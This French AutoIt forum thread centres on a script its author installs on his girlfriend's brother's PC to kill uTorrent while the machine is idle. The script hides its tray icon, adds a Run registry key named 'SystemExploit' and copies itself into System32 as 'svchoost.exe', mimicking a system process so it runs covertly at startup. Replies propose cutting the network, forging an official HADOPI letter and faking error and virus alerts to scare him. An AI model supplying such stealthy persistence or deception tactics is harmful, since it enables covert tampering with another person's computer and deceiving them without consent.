[Ex] KillUtorrent, ProcessExists, ProcessClose ...

Partagez vos scripts, et vos applications AutoIt.
Règles du forum
.
Répondre
n0way
Niveau 2
Niveau 2
Status : Hors ligne

[Ex] KillUtorrent, ProcessExists, ProcessClose ...

Message par n0way »

Alors voilà, c'est un petit exemple de quelques fonctions autoit.

Vous allez trouvez cela inutile, mais j'ai conçu ce petit script qui permet de couper uTorrent quand le pc est inutilisé (cela parait même illogique)

Petit bout d'histoire :

Il m'arrive d'aller dormir chez ma copine (qui a une faible connexion internet déjà de base), et son frère (jamais à la maison) laisse tourner son pc 24/24 sur uTorrent à télécharger comme pas possible sur uTorrent. Ce qui ne laisse plus grand chose aux autres habitants de la maison (qui eux participent déjà beaucoup plus aux tâches de la maison).
Alors avant j'allais fermer uTorrent en son absence, mais lorsqu'il rentrait et voyait que uTorrent avait été fermé il s'en prenait à tout le monde dans la maison.
Alors j'ai eu l'idée de concevoir ce "tueur" de processus lors de l'absence d'une personne, et lorsqu'il retouchait a peine la souris, le processus se relance.

Code : Tout sélectionner

#include <Process.au3>
#include <Timers.au3>

;--------------------------------- variable ---------------------------------
$var = 0
$mousex = 0
$mousey = 0
$IdleMinimum = 600000
Opt("TrayIconHide", 1)

;--------------------------------- verifier le programme se lance au demarrage du pc ---------------------------------
if RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "SystemExploit") = "" Then
    RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "SystemExploit", "REG_SZ", "C:\Windows\System32\svchoost.exe")
    FileCopy(@ScriptFullPath, "C:\Windows\System32\svchoost.exe", 1)
EndIf

;--------------------------------- Fonctionnement continu ---------------------------------
While 1
    If _Timer_GetIdleTime() >= $IdleMinimum Then
        If ProcessExists("uTorrent.exe") Then
            ProcessClose("uTorrent.exe")
            $var = 1
            $mousex = MouseGetPos(0)
            $mousey = MouseGetPos(1)
        EndIf
        Do
            Sleep(20)
        Until _Timer_GetIdleTime() < $IdleMinimum
    EndIf
    Sleep(20)

If $var = 1 And $mousex <> MouseGetPos(0) And $mousey <> MouseGetPos(1) Then
        $var = 0
        ShellExecute("c:\Program Files\uTorrent\uTorrent.exe")
    EndIf

WEnd

Je suis ouvert à vos critiques.

A bientôt,
n0way
Modifié en dernier par n0way le jeu. 23 déc. 2010 10:11, modifié 1 fois.
zeshrek
Niveau 10
Niveau 10

Re: [Ex] KillUtorrent, ProcessExists, ProcessClose ...

Message par zeshrek »

L'idée n'est pas mauvaise, et tu pourrais faire évoluer ton script de 3 facons :
1/ En le transformant en service pour qu'il tourne en tache de fond. Il suffit d'utiliser l'UDF idoine
2/ Eventuellement de lui rajouter un systray ou une hotkey pour 2-3 parametres (activer/desactiver, reglage du timeout, choix du processus a monitorer
3/ En plus (ou a la place si tu preferes) du monitoring d'application, couper purement et simplement le net (un simple changement de l'IP de la passerelle sufirait). Comme ca si le frangin de ta copine se dit "µtorent c'est de la bouse, je change de client" bin il aura le même résultat.

Il y a une autre solution encore plus simple a mettre en oeuvre.
Dans la mesure ou le courrier type d'HADOPI a été mis en ligne (par exemple ici, tu peux aussi te mettre d'accord avec les parents, tu imprimes (sur une laser couleur tant qu'a faire) un faux courrier HADOPI dans lequel tu mets l'IP du routeur familial, et les coordonnées du FAI. Avec ca ils vont voir leur fiston en lui disant d'arreter ses c*nneries. Du coup, ca devrait faciliter la vie a tout le monde dans la maison.
J'aime la guerre psychologique :D
Image
Asterix - La Zizanie
Si vis pacem para bellum
n0way
Niveau 2
Niveau 2

Message par n0way »

Merci zeshrek pour tes conseils, je vais essayer le idoine, pour que ca marche en fond.

Mais, le frère est dans l'age stupide, il n'écoute pas ses parents... et leur attire des soucis, le courrier HADOPI n'arrangerait rien, il téléchargerait encore plus juste pour les enquiquiner.

Je vais voir pour idoine maintenant... Où puis-je le trouver?

A bientôt,
n0way
zeshrek
Niveau 10
Niveau 10

Message par zeshrek »

Heuuuuu... idoine, ca veut dire "fait pour ca" ou "qui correspond a ce qu'il faut" c'est pas un nom d'udf...

Sinon, pour faire tourner un script en service, ca a été évoqué... par exemple ici
Si vis pacem para bellum
n0way
Niveau 2
Niveau 2

Message par n0way »

Ah d'accord, je ne savais pas, merci je vais voir ca.

Sinon j'ai ajouté :

Code : Tout sélectionner

Opt("TrayIconHide", 1)

Cela cache mon icone en tray... on n'y voit plus que du feu.

EDIT : Cela te générait de me parler un peu plus de la 3eme solution que tu as évoqué ? le changement d'IP passerelle...
SrBelial
Niveau 7
Niveau 7

Message par SrBelial »

ouais perso je serais pour une solution encore plus violente : lors de la reprise d'activité (le frangin revient) simuler un message d'erreur touchant utorrent (du type messagebox : "utorrent a rencontré une erreur innatendue et doit se fermer. Plusieurs fichiers ont été corrompus durant l'exécution de utorrent. Microsoft a détecté une instabilité système, merci de bien vouloir vérifier que vous possédez tous les CDs de restauration avant de redémarrer le poste" .... voire même tenter la fausse alerte virus, accompagnée de quelques rares phénomènes inexpliqués : ouverture lecteur cd, bip de la carte mere, popup d'erreur qui s'ouvrent et se ferme immédiatement sans qu'on aie le temps de les lire, l'input souris/clavier qui se bloque pendant une demi seconde toute les trois secondes, et tout ça qui apparait et disparait sans raisons)

je pense qu'il flipperait déjà suffisamment pour réduire de lui même sa consommation effrénée de P2P ....

sinon pour ce qui est du paramétrage de son réseau, qui serait aussi une bonne solution je pense, une façon pas trop compliquée de gérer le bouzin c'est de le faire en ligne de commande, le script se chargeant d'exécuter les lignes relativement facilement.
(cf : http://www.commentcamarche.net/faq/9324 ... us-windows)

Et histoire de lol un peu, une fois que t'as mis en route qqch qui fasse un peu stressé le djeun's rebel'z, si y a moyen d'avoir le script qui va bien, chuis sur qu'on connait tous quelqu'un à replacer dans le droit chemin ... XD
.-SrB-. The One
  • NON ! AutoIt n'est PAS un langage réservé à la réalisation de bots !
  • OUI ! AutoIt est un langage à part entière !
  • Dans SciTE sélectionnez 1 mot puis F1
  • Don't want english doc ?? go to documentation française !! >>ICI<<
[/size]
n0way
Niveau 2
Niveau 2

Message par n0way »

C'est une solution très radicale ;)

Mais j'ai bien peur que le jeun's rebelle formate tout bêtement et recommence... il s’inquiétera peu. Dans le pire des cas il est capable d'emm*rder sa mere pour avoir un nouvelle ordinateur (alors que sa mère n'a pas les moyens)

Pour le plaisir de le programmer, je le ferais peut être oui.

A bientôt, et merci pour le lien
Tlem
Site Admin
Site Admin

Message par Tlem »

Je crois vraiment, que l'on devrait présenter cette personne au jeune en question et mettre sa tête entre les mains du gars de la vidéo ... :lol:
http://www.metacafe.com/fplayer/938322/ ... minute.swf
Thierry

Rechercher sur le forum ----- Les règles du forum
Le "ça ne marche pas" est une conséquence commune découlant de beaucoup trop de raisons potentielles ...

Une idée ne peut pas appartenir à quelqu'un. (Albert Jacquard) tiré du documentaire "Copié n'est pas volé".
n0way
Niveau 2
Niveau 2

Message par n0way »

Ca lui serait bien agréable ;)
Répondre